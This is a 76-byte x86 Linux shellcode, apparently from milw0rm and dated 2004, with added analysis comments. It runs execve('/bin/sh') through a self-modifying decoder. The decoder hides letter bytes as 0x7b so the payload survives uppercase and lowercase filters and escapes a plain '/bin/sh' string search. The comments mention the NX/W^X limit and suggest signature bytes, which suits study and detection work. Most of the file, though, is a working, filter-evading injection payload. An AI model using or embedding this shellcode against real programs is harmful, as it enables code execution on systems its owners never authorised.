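/*-------------------------------------------------------*/
/*    Magic Byte Self Modifying Code for surviving       */
/*              toupper() & tolower()                    */
/*      76bytes execve() _exit() code by XORt            */
/*-------------------------------------------------------*/
/*
 * Analysis notes (32-bit x86 Linux; comments use AT&T operand order).
 *
 *  - None of the 76 bytes below is an ASCII letter, which is why the
 *    blob is left unchanged by toupper()/tolower().  Every byte that
 *    would have been a letter is stored as the placeholder 0x7b ('{')
 *    and repaired at run time by the 25-byte decoder.
 *  - Lines tagged "@" show the instruction as it reads after repair,
 *    not the bytes as stored.
 *  - The decoder writes into the bytes it later executes, so it only
 *    runs from memory that is both writable and executable; W^X / NX
 *    enforcement stops it.
 *  - A plain-text search for "/bin/sh" does not match this blob.  More
 *    stable features for a signature are the jmp/call/pop pair
 *    (\xeb .. \x5e, and \xe8 with a negative rel32), the repne scasb
 *    on 0x7b, and the two int $0x80.
 */
"\xeb\x34"             /* jmp  +0x34 [revert]: lands on the call below    */
"\x5e"                 /* pop  %esi: esi = return address = offset table  */
/*--set-up-variables-------------------------------------*/
"\x89\xf7"             /* mov  %esi, %edi                                 */
"\x83\xef\x22"         /* sub  $0x22, %edi: edi = first encoded byte      */
"\x31\xc9"             /* xor  %ecx, %ecx                                 */
"\xb1\x8c"             /* mov  $0x8c, %cl                                 */
"\xd1\xc9"             /* ror  $0x1, %ecx: ecx = 0x46 (70); repne scasb   */
                       /*   and loop both count this register down        */
/*-scan-for-magic-byte-----------------------------------*/
"\xb0\x7b"             /* [load-byte] mov $0x7b, %al: placeholder value   */
"\xf2\xae"             /* repne scasb: stop one past the next 0x7b        */
"\xff\xcf"             /* dec  %edi: step back onto the 0x7b              */
"\xac"                 /* lodsb: al = DS:(%esi), next table entry; esi++  */
"\x28\x07"             /* subb %al, (%edi): 0x7b - entry = original byte  */
/*--loop-back-to-scanner---------------------------------*/
"\xe2\xf5"             /* loop [load-byte]: rel8 is -0x0b; 0xe is the     */
                       /*   target's offset from the start of the blob    */
/*-------------------------------------[length:25bytes]--*/
//                                                       //
/*--modified-shellcode-----------------------------------*/
/* Runs only after the loop above falls through (ecx == 0).  By then the
 * ten lodsb reads have moved esi from the offset table onto the string. */
"\x89\x7b\x08"         /* movl %esi, 0x8(%esi)  @ argv[0] = path          */
"\x91"                 /* xchg %eax, %ecx: eax = 0                        */
"\x88\x7b\x07"         /* movb %al, 0x7(%esi)   @ NUL after the 7 chars   */
"\x89\x7b\x0c"         /* movl %eax, 0xc(%esi)  @ argv[1] = NULL          */
"\xb0\x0b"             /* movb $0xb, %al: syscall 11, execve              */
"\x89\xf3"             /* movl %esi, %ebx: path                           */
"\x8d\x7b\x08"         /* leal 0x8(%esi), %ecx  @ argv                    */
"\x8d\x7b\x0c"         /* leal 0xc(%esi), %edx  @ envp                    */
"\xcd\x80"             /* int  $0x80                                      */
"\x31\xdb"             /* xorl %ebx, %ebx: exit status 0                  */
"\x89\xd8"             /* movl %ebx, %eax                                 */
"\x40"                 /* inc  %eax: syscall 1, _exit                     */
"\xcd\x80"             /* int  $0x80                                      */
/*--revert-----------------------------------------------*/
"\xe8\xc7\xff\xff\xff" /* call -$0x39: pushes the table address and       */
                       /*   returns control to the pop %esi               */
/*--offset-table-----------------------------------------*/
/* One entry per 0x7b placeholder, in order of appearance; each entry is
 * subtracted from its placeholder (first one: 0x7b - 0x05 = 0x76).      */
"\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13"
/*--string-to-run----------------------------------------*/
"/\x7b\x7b\x7b/\x7b\x7b" /* stored as "/{{{/{{"; reads "/bin/sh" after repair */
/*--------------------------------------[length:51bytes]-*/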
// milw0rm.com [2004-12-22]